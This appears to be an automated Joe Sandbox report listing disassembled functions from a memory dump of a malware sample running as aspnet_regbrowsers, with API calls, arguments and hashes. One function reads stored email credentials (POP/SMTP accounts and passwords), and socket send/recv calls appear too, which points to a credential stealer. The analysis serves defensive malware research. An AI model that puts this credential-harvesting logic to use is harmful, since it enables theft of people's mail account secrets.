CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00404BEE Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

SHQueryValueExW.SHLWAPI(?,?,00000000,00000000,00000000,00000208,00000002,C170F4F3,00000000,00000000), ref: 00404C35

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcessQueryValue
String ID:
API String ID: 3318767951-0
Opcode ID: d2beadab3bee545cf5c60f8980fe712c5f4b0e5d6cba08d7b965a56316f6b4bd
Instruction ID: 79155844af0806bdf0c3860b022b506ec09407af8f096f74cdf457618d2260c4
Opcode Fuzzy Hash: d2beadab3bee545cf5c60f8980fe712c5f4b0e5d6cba08d7b965a56316f6b4bd
Instruction Fuzzy Hash: 16F0247290611436E7206E578E0DCAF7F3CCBC3B25B01003EF908B61C0DAB99A0181B8

Function 00404056 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,0000000A,C7F71852,00000000,00000000,00413CAD,0000001A,00000001), ref: 0040408F

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFolderPathProcess
String ID:
API String ID: 398210565-0
Opcode ID: 5a4567249377e1c5aacc7f09cc20ffc60836f4584ead4ee4f677cdbbf549426b
Instruction ID: 7d0b33caadbb1370849e9dfd1ecad86b360ac2e9a1dca59c17201c727c4e1007
Opcode Fuzzy Hash: 5a4567249377e1c5aacc7f09cc20ffc60836f4584ead4ee4f677cdbbf549426b
Instruction Fuzzy Hash: 57E06D6260156136D23129A7AC09D6B6E7DCBD3FA5B00003FF708F52C1D96D990281BA

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 004044A7 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
Instruction ID: e6a1e737d40be81796f932fb1ea6dd5b05bd2579ff383e5fb5a00b3a8c54de51
Opcode Fuzzy Hash: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
Instruction Fuzzy Hash: 52D0C27604410DBFDF025EE1DC05CAB3F6EEB48354B408425BE2895021D637DA71ABA5

Function 004049B3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SHGetValueW.SHLWAPI(?,?,?,?,?,?,00000002,DC1011D7,00000000,00000000), ref: 004049D8

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
Instruction ID: 49132b90e07f175002bb52db16c83daeb6fc20f74050e769a3614ef6a11dfcc0
Opcode Fuzzy Hash: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
Instruction Fuzzy Hash: 71D0923214020DBBDF026ED1DC02FAA3F2AAB09758F104014FB18280A1C677D631AB95

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 004049DC Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

SHEnumKeyExW.SHLWAPI(?,?,?,?,00000002,ECA4834B,00000000,00000000), ref: 004049FB

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
Instruction ID: fb20b8ae34c3d99b6a2ec1f59af3280c7c0bbdac25ffdbb9458fe1f208d0831b
Opcode Fuzzy Hash: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
Instruction Fuzzy Hash: 45D0023114430D7BEF115ED1DC06F597F1ABB49B54F104455BB18680E19673A6305755

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00408B2C Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,00000000,E0CF5891,00000000,00000000), ref: 00408B41

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
Instruction ID: 291ca984118c00001a410e8fe814b9ebecee15bf7cc635df9db1cfcd8d33b31d
Opcode Fuzzy Hash: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
Instruction Fuzzy Hash: 0EB092B004820C3EAE002EF19C05C3B3E8DEA4454870044757E0CE5051EA36DE1110A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 004044EE Relevance: 1.3, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Part of subcall function 004044A7: GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB

GetLastError.KERNEL32 ref: 00404585

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateErrorFreeLastPrivateProfileString
String ID:
API String ID: 4065557613-0
Opcode ID: 07df6e299c1e51546a6fce8a11171accc3f3248d34e9f20b559e9614b6af16c3
Instruction ID: 4921b4961515552709d35feb502e82dc384c9b3b90426e204c6f6ec5e0b55acd
Opcode Fuzzy Hash: 07df6e299c1e51546a6fce8a11171accc3f3248d34e9f20b559e9614b6af16c3
Instruction Fuzzy Hash: 901157B26011043BEB249EA9AD46F7FB768DF84368F10413FFB05E61D0EA789C00069C

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

Technology, xrefs: 0040D08D
PopPort, xrefs: 0040D0A7
PopPassword, xrefs: 0040D0D0
SmtpPort, xrefs: 0040D0EB
EmailAddress, xrefs: 0040D074
PopServer, xrefs: 0040D099
SmtpAccount, xrefs: 0040D0FA
SmtpPassword, xrefs: 0040D117
PopAccount, xrefs: 0040D0B6
SmtpServer, xrefs: 0040D0DC

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 3660427363-2111798378
Opcode ID: b68ba21e4a3a0049e44e4174c680ab59653fe0191a5276204f50c9857b9783d9
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: b68ba21e4a3a0049e44e4174c680ab59653fe0191a5276204f50c9857b9783d9
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 012723B0 Relevance: .8, Instructions: 779COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.666825665.0000000001272000.00000020.00000001.01000000.0000000B.sdmp, Offset: 01270000, based on PE: true

Associated: 0000001A.00000002.666816077.0000000001270000.00000002.00000001.01000000.0000000B.sdmpDownload File
